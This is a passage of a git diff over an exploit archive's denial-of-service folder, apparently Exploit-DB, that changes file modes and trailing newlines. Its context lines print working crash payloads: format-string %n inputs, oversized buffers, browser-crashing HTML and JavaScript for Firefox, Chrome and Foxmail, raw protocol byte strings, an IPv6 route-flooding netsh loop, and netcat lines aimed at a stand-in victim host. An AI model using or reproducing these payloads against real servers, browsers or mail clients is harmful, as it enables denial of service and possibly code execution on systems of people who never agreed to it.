b/platforms/multiple/dos/29875.py @@ -26,4 +26,4 @@ yourself! Don't bug me with this shit. /* Vendor contacted? */ NO! Why should I contact them? :) lol, go away and contact them yourself. -/* EOF */ \ No newline at end of file +/* EOF */ \ No newline at end of file diff --git a/platforms/multiple/dos/29900.txt b/platforms/multiple/dos/29900.txt old mode 100755 new mode 100644 index 8bc93f510..b214ab0e4 --- a/platforms/multiple/dos/29900.txt +++ b/platforms/multiple/dos/29900.txt @@ -76,4 +76,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA -a=T38FaxUdpEC:t38UDPRedundancy \ No newline at end of file +a=T38FaxUdpEC:t38UDPRedundancy \ No newline at end of file diff --git a/platforms/multiple/dos/29901.txt b/platforms/multiple/dos/29901.txt old mode 100755 new mode 100644 index 156defa65..13259a05b --- a/platforms/multiple/dos/29901.txt +++ b/platforms/multiple/dos/29901.txt @@ -74,4 +74,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -AAAAAAAAA \ No newline at end of file +AAAAAAAAA \ No newline at end of file diff --git a/platforms/multiple/dos/30139.c b/platforms/multiple/dos/30139.c old mode 100755 new mode 100644 index 2021f6d21..5dc302180 --- a/platforms/multiple/dos/30139.c +++ b/platforms/multiple/dos/30139.c @@ -107,5 +107,4 @@ int main(int argc,char **argv) printf("\nTEST FAILED!\n"); return 1; -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/dos/30163.html b/platforms/multiple/dos/30163.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30187.txt b/platforms/multiple/dos/30187.txt old mode 100755 new mode 100644 index 819cc5fef..5d9276d97 --- a/platforms/multiple/dos/30187.txt +++ b/platforms/multiple/dos/30187.txt @@ -8,4 +8,4 @@ Successful exploits may allow remote attackers to execute arbitrary code in the AppWeb 2.2.2 is reported vulnerable; other versions may also be affected. -'GET %n://localhost:80/" request' \ No newline at end of file +'GET %n://localhost:80/" request' \ No newline at end of file diff --git a/platforms/multiple/dos/30497.c b/platforms/multiple/dos/30497.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30498.txt b/platforms/multiple/dos/30498.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30513.txt b/platforms/multiple/dos/30513.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30519.txt b/platforms/multiple/dos/30519.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30524.txt b/platforms/multiple/dos/30524.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30526.txt b/platforms/multiple/dos/30526.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30527.txt b/platforms/multiple/dos/30527.txt old mode 100755 new mode 100644 index cd792ef69..9519c2e9f --- a/platforms/multiple/dos/30527.txt +++ b/platforms/multiple/dos/30527.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Vavoom 1.24 is vulnerable; prior versions may also be affected. -For the denial-of-service vulnerability, the attacker sends a packet to UDP port 26000 containing the following hexadecimal bytes: 80 02 ff 00 \ No newline at end of file +For the denial-of-service vulnerability, the attacker sends a packet to UDP port 26000 containing the following hexadecimal bytes: 80 02 ff 00 \ No newline at end of file diff --git a/platforms/multiple/dos/30528.txt b/platforms/multiple/dos/30528.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30529.txt b/platforms/multiple/dos/30529.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30540.txt b/platforms/multiple/dos/30540.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30566.txt b/platforms/multiple/dos/30566.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30574.txt b/platforms/multiple/dos/30574.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30592.py b/platforms/multiple/dos/30592.py index 14494a780..7dea054e9 100755 --- a/platforms/multiple/dos/30592.py +++ b/platforms/multiple/dos/30592.py @@ -21,4 +21,4 @@ connard = "cool" salope = "suceuse" dtc = imageop.tovideo(sexshit,1,4461,-2147002257) sexshit = "dtc"*52 -print connard,supaire," fin de dump" \ No newline at end of file +print connard,supaire," fin de dump" \ No newline at end of file diff --git a/platforms/multiple/dos/30644.txt b/platforms/multiple/dos/30644.txt old mode 100755 new mode 100644 index 7bacef178..db8867977 --- a/platforms/multiple/dos/30644.txt +++ b/platforms/multiple/dos/30644.txt @@ -6,4 +6,4 @@ Exploiting these issues will allow attackers to execute arbitrary code with the These issues affect Dawn of Time 1.69s beta4 and 1.69r; other versions may also be affected. -http://%n%n%n%n%n:%n%n%n%n%n@www.example.com:4001/locked \ No newline at end of file +http://%n%n%n%n%n:%n%n%n%n%n@www.example.com:4001/locked \ No newline at end of file diff --git a/platforms/multiple/dos/30702.html b/platforms/multiple/dos/30702.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30713.html b/platforms/multiple/dos/30713.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30779.txt b/platforms/multiple/dos/30779.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30791.txt b/platforms/multiple/dos/30791.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30814.txt b/platforms/multiple/dos/30814.txt old mode 100755 new mode 100644 index 603d56a5c..12b177b29 --- a/platforms/multiple/dos/30814.txt +++ b/platforms/multiple/dos/30814.txt @@ -8,4 +8,4 @@ Skype 3.6.0.216 for Microsoft Windows is vulnerable to this issue; other version The following URI is sufficient to trigger this issue: -skype:?voicemail \ No newline at end of file +skype:?voicemail \ No newline at end of file diff --git a/platforms/multiple/dos/30856.txt b/platforms/multiple/dos/30856.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30885.txt b/platforms/multiple/dos/30885.txt old mode 100755 new mode 100644 index 832a15905..8b49d9c37 --- a/platforms/multiple/dos/30885.txt +++ b/platforms/multiple/dos/30885.txt @@ -10,4 +10,4 @@ HELO ../A/ * 950 MAIL FROM: ../A/ * 950 RCPT TO: ../A/ * 950 data -../A/ * 950 \ No newline at end of file +../A/ * 950 \ No newline at end of file diff --git a/platforms/multiple/dos/30896.txt b/platforms/multiple/dos/30896.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30903.c b/platforms/multiple/dos/30903.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30906.c b/platforms/multiple/dos/30906.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30922.c b/platforms/multiple/dos/30922.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30943.txt b/platforms/multiple/dos/30943.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30974.txt b/platforms/multiple/dos/30974.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30989.txt b/platforms/multiple/dos/30989.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30990.txt b/platforms/multiple/dos/30990.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/30991.txt b/platforms/multiple/dos/30991.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31100.txt b/platforms/multiple/dos/31100.txt old mode 100755 new mode 100644 index bdfb42dd4..2032ff867 --- a/platforms/multiple/dos/31100.txt +++ b/platforms/multiple/dos/31100.txt @@ -6,4 +6,4 @@ Successful exploits allow remote attackers to execute arbitrary code in the cont Versions prior to Anon Proxy Server 0.103 are vulnerable to this issue. -print "A" x 430 . '"' x 29 . "A" x 40 . "\n" \ No newline at end of file +print "A" x 430 . '"' x 29 . "A" x 40 . "\n" \ No newline at end of file diff --git a/platforms/multiple/dos/31128.txt b/platforms/multiple/dos/31128.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31136.txt b/platforms/multiple/dos/31136.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31148.txt b/platforms/multiple/dos/31148.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31150.txt b/platforms/multiple/dos/31150.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31203.txt b/platforms/multiple/dos/31203.txt old mode 100755 new mode 100644 index 027f3ac87..c4dbce58e --- a/platforms/multiple/dos/31203.txt +++ b/platforms/multiple/dos/31203.txt @@ -8,4 +8,4 @@ Firefox 2.0.0.12 is vulnerable; other versions may also be affected. <iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe> <iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe> -<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe> \ No newline at end of file +<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe> \ No newline at end of file diff --git a/platforms/multiple/dos/31223.txt b/platforms/multiple/dos/31223.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31232.txt b/platforms/multiple/dos/31232.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31271.txt b/platforms/multiple/dos/31271.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31285.txt b/platforms/multiple/dos/31285.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31327.txt b/platforms/multiple/dos/31327.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31343.txt b/platforms/multiple/dos/31343.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31376.txt b/platforms/multiple/dos/31376.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31378.txt b/platforms/multiple/dos/31378.txt old mode 100755 new mode 100644 index 4fb0abbad..acec98496 --- a/platforms/multiple/dos/31378.txt +++ b/platforms/multiple/dos/31378.txt @@ -7,4 +7,4 @@ Exploiting this issue will cause the server to copy data to a NULL pointer, whic This issue affects RemotelyAnywhere Server and Workstation 8.0.688; other versions may also be affected. GET / HTTP/1.1 -Accept-Charset: boom \ No newline at end of file +Accept-Charset: boom \ No newline at end of file diff --git a/platforms/multiple/dos/31542.txt b/platforms/multiple/dos/31542.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31728.txt b/platforms/multiple/dos/31728.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31785.txt b/platforms/multiple/dos/31785.txt old mode 100755 new mode 100644 index bac39cafb..093b45ae2 --- a/platforms/multiple/dos/31785.txt +++ b/platforms/multiple/dos/31785.txt @@ -6,4 +6,4 @@ Successful exploits allow remote attackers to cause computers to consume excessi Microsoft Windows XP, Microsoft Windows Server 2003, and Linux are prone to these issues. Other operating systems may also be affected. -for /L %k in (0, 1, 9999) DO for /L %i in (0, 1, 9999) DO netsh interface ipv6 add route 2001:db8:%k:%i::/64 "Local Area Connection" publish=yes \ No newline at end of file +for /L %k in (0, 1, 9999) DO for /L %i in (0, 1, 9999) DO netsh interface ipv6 add route 2001:db8:%k:%i::/64 "Local Area Connection" publish=yes \ No newline at end of file diff --git a/platforms/multiple/dos/31817.html b/platforms/multiple/dos/31817.html old mode 100755 new mode 100644 index 576aae3ef..765433324 --- a/platforms/multiple/dos/31817.html +++ b/platforms/multiple/dos/31817.html @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting This issue affects Firefox 2.0.0.14; other versions may also be vulnerable. -<script> // It might not work on your platform due to a ton of reasons. // tested on WinXP SP2 JRE version 1.6.0_01 function run() { var data = '<applet src="javascript:" id="x">'; y.document.open(); y.document.write(data); y.document.close(); } </script> <input name="button" value="Run" onclick="run()" type="button"> <iframe name="y" id="x" src="" frameborder="1" height="200"></iframe> \ No newline at end of file +<script> // It might not work on your platform due to a ton of reasons. // tested on WinXP SP2 JRE version 1.6.0_01 function run() { var data = '<applet src="javascript:" id="x">'; y.document.open(); y.document.write(data); y.document.close(); } </script> <input name="button" value="Run" onclick="run()" type="button"> <iframe name="y" id="x" src="" frameborder="1" height="200"></iframe> \ No newline at end of file diff --git a/platforms/multiple/dos/31872.py b/platforms/multiple/dos/31872.py index 7e31da3b5..55ec1efd0 100755 --- a/platforms/multiple/dos/31872.py +++ b/platforms/multiple/dos/31872.py @@ -47,4 +47,4 @@ w.write(""" """ % value) w.close() -- -----------/ \ No newline at end of file +- -----------/ \ No newline at end of file diff --git a/platforms/multiple/dos/31919.c b/platforms/multiple/dos/31919.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31931.txt b/platforms/multiple/dos/31931.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31932.txt b/platforms/multiple/dos/31932.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31957.txt b/platforms/multiple/dos/31957.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31958.txt b/platforms/multiple/dos/31958.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31998.txt b/platforms/multiple/dos/31998.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/31999.txt b/platforms/multiple/dos/31999.txt old mode 100755 new mode 100644 index 495430fab..6969ae8a7 --- a/platforms/multiple/dos/31999.txt +++ b/platforms/multiple/dos/31999.txt @@ -11,4 +11,4 @@ The following 'ldapadd' entry is sufficient to trigger the issue: dn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies globalGroupName: GlobalAdminGroup objectclass: top -objectclass: ibm-globalAdminGroup \ No newline at end of file +objectclass: ibm-globalAdminGroup \ No newline at end of file diff --git a/platforms/multiple/dos/32006.txt b/platforms/multiple/dos/32006.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32086.c b/platforms/multiple/dos/32086.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32104.txt b/platforms/multiple/dos/32104.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32125.txt b/platforms/multiple/dos/32125.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32127.txt b/platforms/multiple/dos/32127.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32192.txt b/platforms/multiple/dos/32192.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32193.txt b/platforms/multiple/dos/32193.txt old mode 100755 new mode 100644 index 0117ff39b..cb6181694 --- a/platforms/multiple/dos/32193.txt +++ b/platforms/multiple/dos/32193.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code in the context of the We were not told which versions are affected. We will update this BID as more information emerges. -echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79 \ No newline at end of file +echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79 \ No newline at end of file diff --git a/platforms/multiple/dos/32194.txt b/platforms/multiple/dos/32194.txt old mode 100755 new mode 100644 index 810d507d6..21a52ce6d --- a/platforms/multiple/dos/32194.txt +++ b/platforms/multiple/dos/32194.txt @@ -8,4 +8,4 @@ NoticeWare Email Server NG 4.6.2 and 4.6.3 are vulnerable; other versions may al The following exploit example is available: -A001 LOGIN Ax5000 AAAAA \ No newline at end of file +A001 LOGIN Ax5000 AAAAA \ No newline at end of file diff --git a/platforms/multiple/dos/32195.txt b/platforms/multiple/dos/32195.txt old mode 100755 new mode 100644 index 0444662c1..b98f718ac --- a/platforms/multiple/dos/32195.txt +++ b/platforms/multiple/dos/32195.txt @@ -8,4 +8,4 @@ WinGate 6.2.2 is vulnerable; other versions may also be affected. The following example command is available: -LIST Ax1000 * \ No newline at end of file +LIST Ax1000 * \ No newline at end of file diff --git a/platforms/multiple/dos/32208.txt b/platforms/multiple/dos/32208.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32310.txt b/platforms/multiple/dos/32310.txt old mode 100755 new mode 100644 index 4abbe1751..e069c2543 --- a/platforms/multiple/dos/32310.txt +++ b/platforms/multiple/dos/32310.txt @@ -7,4 +7,4 @@ Given the nature of this issue, attackers may also be able to run arbitrary code Softalk Mail Server 8.5.1 is vulnerable; other versions may also be affected. -APPEND Ax5000 (UIDNEXT MESSAGES) \ No newline at end of file +APPEND Ax5000 (UIDNEXT MESSAGES) \ No newline at end of file diff --git a/platforms/multiple/dos/32311.html b/platforms/multiple/dos/32311.html old mode 100755 new mode 100644 index 0963292f3..bca675f53 --- a/platforms/multiple/dos/32311.html +++ b/platforms/multiple/dos/32311.html @@ -8,4 +8,4 @@ Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected. NOTE: Reports indicate that this issue may not be exploitable as described and may depend on a particular WebKit configuration. -<!-- Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit Exploit written by Exodus. http://www.blackhat.org.il http://www.blackhat.org.il/index.php/ready-set-chrome/ http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html --> <HTML> <HEAD> <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE> <SCRIPT language="JavaScript"> function buff(len) { var buffer; for(var i = 0; i != len; i++) { buffer += 'E';} return buffer; } </SCRIPT> </HEAD> <SCRIPT> document.write('<body title=\"' + buff(31337) + '\">'); </SCRIPT> </BODY> </HTML> \ No newline at end of file +<!-- Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit Exploit written by Exodus. http://www.blackhat.org.il http://www.blackhat.org.il/index.php/ready-set-chrome/ http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html --> <HTML> <HEAD> <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE> <SCRIPT language="JavaScript"> function buff(len) { var buffer; for(var i = 0; i != len; i++) { buffer += 'E';} return buffer; } </SCRIPT> </HEAD> <SCRIPT> document.write('<body title=\"' + buff(31337) + '\">'); </SCRIPT> </BODY> </HTML> \ No newline at end of file diff --git a/platforms/multiple/dos/32335.js b/platforms/multiple/dos/32335.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32362.txt b/platforms/multiple/dos/32362.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32381.js b/platforms/multiple/dos/32381.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32386.txt b/platforms/multiple/dos/32386.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32400.html b/platforms/multiple/dos/32400.html old mode 100755 new mode 100644 index 8c0b35bc0..8d7fe3a03 --- a/platforms/multiple/dos/32400.html +++ b/platforms/multiple/dos/32400.html @@ -6,4 +6,4 @@ Successfully exploiting this issue will allow an attacker to execute arbitrary c Foxmail Email Client 6.5 is vulnerable; other versions may also be affected. -<html> <body> <P>Author:friddy QQ:568623 <P>Result:Program Crash <BR> <A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">ClickME</a> >Clickme</A> </body> </html> \ No newline at end of file +<html> <body> <P>Author:friddy QQ:568623 <P>Result:Program Crash <BR> <A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">ClickME</a> >Clickme</A> </body> </html> \ No newline at end of file diff --git a/platforms/multiple/dos/32519.txt b/platforms/multiple/dos/32519.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32581.txt b/platforms/multiple/dos/32581.txt old mode 100755 new mode 100644 index b0a2d3e04..a9e34f7cc --- a/platforms/multiple/dos/32581.txt +++ b/platforms/multiple/dos/32581.txt @@ -10,4 +10,4 @@ To halt the application: raise SystemExit To consume excessive resources: -return 'foo'.encode('test.testall') \ No newline at end of file +return 'foo'.encode('test.testall') \ No newline at end of file diff --git a/platforms/multiple/dos/32596.txt b/platforms/multiple/dos/32596.txt old mode 100755 new mode 100644 index 7f97fba20..ad8a174ff --- a/platforms/multiple/dos/32596.txt +++ b/platforms/multiple/dos/32596.txt @@ -8,4 +8,4 @@ This issue affects versions prior to GeSHi 1.0.8. The following example exploit is available: -< \ No newline at end of file +< \ No newline at end of file diff --git a/platforms/multiple/dos/32712.txt b/platforms/multiple/dos/32712.txt old mode 100755 new mode 100644 index 4b0f33152..c8923ff7a --- a/platforms/multiple/dos/32712.txt +++ b/platforms/multiple/dos/32712.txt @@ -8,4 +8,4 @@ WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 is affected; The following string is sufficient to trigger this issue: -?abc? \ No newline at end of file +?abc? \ No newline at end of file diff --git a/platforms/multiple/dos/32774.txt b/platforms/multiple/dos/32774.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/32836.html b/platforms/multiple/dos/32836.html old mode 100755 new mode 100644 index bf34a923a..200257f32 --- a/platforms/multiple/dos/32836.html +++ b/platforms/multiple/dos/32836.html @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Firefox 2.0.0.20 is vulnerable; other versions may also be affected. -<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML> \ No newline at end of file +<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML> \ No newline at end of file diff --git a/platforms/multiple/dos/32949.txt b/platforms/multiple/dos/32949.txt old mode 100755 new mode 100644 index 5380b1aea..330b2be12 --- a/platforms/multiple/dos/32949.txt +++ b/platforms/multiple/dos/32949.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to crash the application, denying alias aspam "admin;admin;admin;admin;admin;admin;admin;timeleft;timeleft;timeleft" alias bspam "aspam;aspam;aspam;aspam;aspam" -bind i "bspam; bspam; bspam" \ No newline at end of file +bind i "bspam; bspam; bspam" \ No newline at end of file diff --git a/platforms/multiple/dos/33037.html b/platforms/multiple/dos/33037.html old mode 100755 new mode 100644 index 9ead7d67a..ba9d1753c --- a/platforms/multiple/dos/33037.html +++ b/platforms/multiple/dos/33037.html @@ -8,4 +8,4 @@ Successful exploits may allow the attacker to crash the affected application, de <html> <video src=%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n>Video</video> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/multiple/dos/33058.txt b/platforms/multiple/dos/33058.txt old mode 100755 new mode 100644 index 3cf1972b9..29e4c7138 --- a/platforms/multiple/dos/33058.txt +++ b/platforms/multiple/dos/33058.txt @@ -26,4 +26,4 @@ printf "%0.4194310f", 0x0.0x41414141; The following proof-of-concept J program is available: -cxib=0.<?php echo str_repeat("1",296450); ?> \ No newline at end of file +cxib=0.<?php echo str_repeat("1",296450); ?> \ No newline at end of file diff --git a/platforms/multiple/dos/33080.txt b/platforms/multiple/dos/33080.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33083.txt b/platforms/multiple/dos/33083.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33086.txt b/platforms/multiple/dos/33086.txt old mode 100755 new mode 100644 index 18e0b1057..2a2ce495f --- a/platforms/multiple/dos/33086.txt +++ b/platforms/multiple/dos/33086.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to cause the application to crash, America's Army 3.0.4 and prior versions are vulnerable. -echo blah | nc SERVER 39300 -v -v -u \ No newline at end of file +echo blah | nc SERVER 39300 -v -v -u \ No newline at end of file diff --git a/platforms/multiple/dos/33096.txt b/platforms/multiple/dos/33096.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33099.txt b/platforms/multiple/dos/33099.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33100.txt b/platforms/multiple/dos/33100.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33104.txt b/platforms/multiple/dos/33104.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33105.txt b/platforms/multiple/dos/33105.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33133.txt b/platforms/multiple/dos/33133.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33182.txt b/platforms/multiple/dos/33182.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33251.txt b/platforms/multiple/dos/33251.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33386.html b/platforms/multiple/dos/33386.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33532.txt b/platforms/multiple/dos/33532.txt old mode 100755 new mode 100644 index 382238454..0f09694cd --- a/platforms/multiple/dos/33532.txt +++ b/platforms/multiple/dos/33532.txt @@ -13,4 +13,4 @@ s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e" s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40" s+="\x81\x04\x75\x6e\x69\x76" s+="\x82"*10000 -s+="\x82\x06\x6d\x75\x6e\x69\x63\x68" \ No newline at end of file +s+="\x82\x06\x6d\x75\x6e\x69\x63\x68" \ No newline at end of file diff --git a/platforms/multiple/dos/33559.txt b/platforms/multiple/dos/33559.txt old mode 100755 new mode 100644 index 501a8425e..6ef0f07ba --- a/platforms/multiple/dos/33559.txt +++ b/platforms/multiple/dos/33559.txt @@ -8,4 +8,4 @@ Sun Java System Web Server 7.0 Update 6 is affected; other versions may also be The following example request is available: -" / HTTP/1.0\n\n" \ No newline at end of file +" / HTTP/1.0\n\n" \ No newline at end of file diff --git a/platforms/multiple/dos/33560.txt b/platforms/multiple/dos/33560.txt old mode 100755 new mode 100644 index 164b6f8be..bb8380cc4 --- a/platforms/multiple/dos/33560.txt +++ b/platforms/multiple/dos/33560.txt @@ -16,4 +16,4 @@ s+="Host: localhost\n" s+="Depth: 0\n" s+="Content-Length: 58\n" s+="Content-Type: application/xml\n\n" -s+="<?xml version=\"1.0\" encoding=\"utf-%n%n%n%n%n%n%n%n%n%n\"?>" \ No newline at end of file +s+="<?xml version=\"1.0\" encoding=\"utf-%n%n%n%n%n%n%n%n%n%n\"?>" \ No newline at end of file diff --git a/platforms/multiple/dos/33579.txt b/platforms/multiple/dos/33579.txt old mode 100755 new mode 100644 index 16975844b..5b813cc71 --- a/platforms/multiple/dos/33579.txt +++ b/platforms/multiple/dos/33579.txt @@ -9,4 +9,4 @@ Ingres Database 9.3 on Unix is vulnerable; other versions may also be affected. s = "\x00\x00\x00\x00" s += "\xff\xff\xff\xff" s += "\x3c\x00\x00\x00\x06\x00\x00\x00" -s += "A" * 1000 \ No newline at end of file +s += "A" * 1000 \ No newline at end of file diff --git a/platforms/multiple/dos/33584.txt b/platforms/multiple/dos/33584.txt old mode 100755 new mode 100644 index bfe5fc567..79265ef0e --- a/platforms/multiple/dos/33584.txt +++ b/platforms/multiple/dos/33584.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to cause the application to crash, denying se IBM DB2 9.7 is vulnerable; other versions may also be affected. The following sequence of bytes can trigger this vulnerability: -"\x00\x05\x03\x31\x41" \ No newline at end of file +"\x00\x05\x03\x31\x41" \ No newline at end of file diff --git a/platforms/multiple/dos/33607.html b/platforms/multiple/dos/33607.html old mode 100755 new mode 100644 index cc7634050..2cea9206a --- a/platforms/multiple/dos/33607.html +++ b/platforms/multiple/dos/33607.html @@ -6,4 +6,4 @@ Successful exploits may allow an attacker to crash the affected browser, resulti The issue affects Firefox 3.6.7 and SeaMonkey 2.0.1; other 